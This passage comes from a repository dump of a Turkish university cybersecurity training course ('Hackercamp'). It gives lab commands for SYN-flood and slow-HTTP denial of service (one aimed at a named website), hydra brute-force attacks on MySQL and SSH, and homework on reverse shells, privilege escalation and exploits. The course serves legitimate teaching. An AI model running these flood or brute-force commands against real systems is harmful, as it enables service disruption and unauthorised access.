çalıştırınız ve lab makineleri üzerinde test ediniz. 40 | - Mimikatz aracını araştırınız. 41 | - Metasploit komutlarını inceleyiniz. Pivot işleminin nasıl yapıldığını araştırınız. 42 | - Metasploit aracı dışında exploit sitelerinden seçtiğiniz bir exploiti indirip çalıştırınız. 43 | - Reverse ile bind shell almanın farklarını öğreniniz. 44 | - Sunucudan shell almanın farklı yollarını araştırınız. 45 | - Linux sunuculardan alınabilecek reverse shell yollarını araştırınız. 46 | - Linux sunuculara erişim sağlandıktan sonra yetki yükseltmenin nasıl yapılacağını araştırınız. 47 | - Metasploitable dağıtımından normal yetkili shell aldıktan sonra root yetkisine çıkaracak şekilde exploit etmeyi deneyiniz. 48 | -------------------------------------------------------------------------------- /01-ag-guvenligi/03-dos-saldirilari.md: -------------------------------------------------------------------------------- 1 | # DoS Saldırıları 2 | 3 | ## Komutlar 4 | 5 | ``` 6 | hping3 --syn --flood 10.0.3.8 21 7 | slowhttptest -u http://halitalptekin.com 8 | ``` 9 | 10 | ## Ödevler 11 | 12 | - Slow dos saldırısının nasıl çalıştığını araştırınız. 13 | - Syn flood saldırısına nasıl önlem alınabileceğini araştırınız. 14 | - Syn cookie nedir ve ne için kullanılır? 15 | - DDoS nedir ve nasıl yapılır araştırınız. 16 | - DNS veya NTP üzerinden yapılan DDoS saldırılarını araştırınız. 17 | -------------------------------------------------------------------------------- /01-ag-guvenligi/04-sifre-kirma.md: -------------------------------------------------------------------------------- 1 | # Sifre Kirma 2 | 3 | ## Komutlar 4 | 5 | ``` 6 | hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://10.0.3.7 -e nsr 7 | hydra -L usernames.txt -P passwords.txt ssh://10.0.3.7 -t 32 8 | ``` 9 | 10 | ## Ödevler 11 | 12 | - Şifre kırma saldırılarını farklı protokoller için de deneyiniz. 13 | - Telnet protokolüne gerçekleştirilecek şifre kırma saldırılarının SSH'a göre neden stabil olmadığını araştırınız. 14 | - Hydra dışında diğer şifre kırma araçlarını deneyiniz. 15 | - İnternet üzerinden çeşitli wordlistleri araştırınız ve kendi arşivinizi yapınız. 16 | -------------------------------------------------------------------------------- /01-ag-guvenligi/README.md: -------------------------------------------------------------------------------- 1 | # Ağ Güvenliği 2 | 3 | Konu | Açıklama 4 | ---- | ----------- 5 | [Temel Network](00-temel-network.md) | Network temelleri 6 | [Bilgi Toplama](01-bilgi-toplama.md) | Hedef sistemler hakkında aktif ve pasif bilgi toplama 7 | [Servis Saldırıları](02-servis-saldirilari.md) | Servislere yönelik saldırılar 8 | [DoS Saldirilari](03-dos-saldirilari.md) | Erişim engelleme saldırıları 9 | [Sifre Kırma](04-sifre-kirma.md) | Servislere yönelik şifre kırma saldırıları 10 | -------------------------------------------------------------------------------- /02-web-guvenligi/00-temel-web.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/02-web-guvenligi/00-temel-web.md -------------------------------------------------------------------------------- /02-web-guvenligi/01-bilgi-toplama.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/02-web-guvenligi/01-bilgi-toplama.md -------------------------------------------------------------------------------- /02-web-guvenligi/02-saldiri-turleri.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/02-web-guvenligi/02-saldiri-turleri.md -------------------------------------------------------------------------------- /02-web-guvenligi/03-korunma-yontemleri.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/02-web-guvenligi/03-korunma-yontemleri.md -------------------------------------------------------------------------------- /02-web-guvenligi/README.md: -------------------------------------------------------------------------------- 1 | # Web Güvenliği 2 | 3 | Konu | Açıklama 4 | ---- | ----------- 5 | [Temel Web](00-temel-web.md) | Web teknolojisinin temelleri ve protokolleri 6 | [Bilgi Toplama](01-bilgi-toplama.md) | Web uygulamalarına ve servislerine yönelik bilgi toplama 7 | [Saldırı Türleri](02-saldiri-turleri.md) | Saldırı yöntemleri 8 | [Korunma Yontemleri](03-korunma-yontemleri.md) | Korunma yöntemleri 9 | -------------------------------------------------------------------------------- /03-yazilim-guvenligi/00-tersine-muhendislige-giris.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/03-yazilim-guvenligi/00-tersine-muhendislige-giris.md -------------------------------------------------------------------------------- /03-yazilim-guvenligi/01-zararli-yazilim-analizi.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/03-yazilim-guvenligi/01-zararli-yazilim-analizi.md -------------------------------------------------------------------------------- /03-yazilim-guvenligi/02-mobil-yazilim-guvenligi.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/03-yazilim-guvenligi/02-mobil-yazilim-guvenligi.md -------------------------------------------------------------------------------- /03-yazilim-guvenligi/03-uygulama-guvenligi.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/03-yazilim-guvenligi/03-uygulama-guvenligi.md -------------------------------------------------------------------------------- /03-yazilim-guvenligi/README.md: -------------------------------------------------------------------------------- 1 | # Yazılım Güvenliği 2 | 3 | Konu | Açıklama 4 | ---- | ----------- 5 | [Tersine Mühendisliğe Giriş](00-tersine-muhendislige-giris.md) | Tersine mühendislik temelleri 6 | [Zararlı Yazılım Analizi](01-zararli-yazilim-analizi.md) | Zararlı yazılımların analiz yöntemleri 7 | [Mobil Yazılım Güvenliği](02-mobil-yazilim-guvenligi.md) | Mobil yazılım güvenliği 8 | [Uygulama Güvenliği](03-uygulama-guvenligi.md) | Genel uygulama güvenliği 9 | -------------------------------------------------------------------------------- /04-diger/00-ctf.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/04-diger/00-ctf.md -------------------------------------------------------------------------------- /04-diger/01-donanim-guvenligi.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/04-diger/01-donanim-guvenligi.md -------------------------------------------------------------------------------- /04-diger/02-tasinabilir-saldiri-platformlari.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/04-diger/02-tasinabilir-saldiri-platformlari.md -------------------------------------------------------------------------------- /04-diger/README.md: -------------------------------------------------------------------------------- 1 | # Diğer 2 | 3 | Konu | Açıklama 4 | ---- | ----------- 5 | [CTF](00-ctf.md) | CTF yarışmalarının amacı ve hazırlık 6 | [Donanım Güvenliği](01-donanim-guvenligi.md) | Donanım cihazlarına yönelik saldırılar 7 | [Taşınabilir Saldırı Platformları](02-tasinabilir-saldiri-platformlari.md) | Taşınabilir saldırı platformları ve getirdikleri 8 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Hackercamp 2 | 3 | Hackercamp, üniversite öğrencilerine yönelik geniş kapsamlı ve uygulamalı bir siber güvenlik eğitimidir. Burada yer alan tüm materyaller ders içerisinde kullanılmak üzere hazırlanmıştır. 4 | 5 | Konu | Açıklama 6 | ---- | ----------- 7 | [Temeller](00-temeller/README.md) | Siber güvenliğe giriş ve diğer konular için gerekli temeller 8 | [Ağ Güvenliği](01-ag-guvenligi/README.md) | Kablolu ve kablosuz ağ saldırıları 9 | [Web Güvenliği](02-web-guvenligi/README.md) | Web uygulaması saldırıları ve savunma yöntemleri 10 | [Yazılım Güvenliği](03-yazilim-guvenligi/README.md) | Güvenli yazılım geliştirme ve tersine mühendislik 11 | [Diğer](04-diger/README.md) | Diğer kategorilerde yer almayan siber güvenlik konuları 12 | 13 | # İletişim 14 | 15 | Eğitim ile ilgili tüm problemler ve sorular için [mail grubu](https://groups.google.com/forum/#!forum/hacker-camp) kullanılmaktadır. Diğer sorularınız için camp@octosec.net adresine mail atabilirsiniz. 16 | 17 | [![Logo](logo.png)](http://www.octosec.net) 18 | -------------------------------------------------------------------------------- /logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/logo.png --------------------------------------------------------------------------------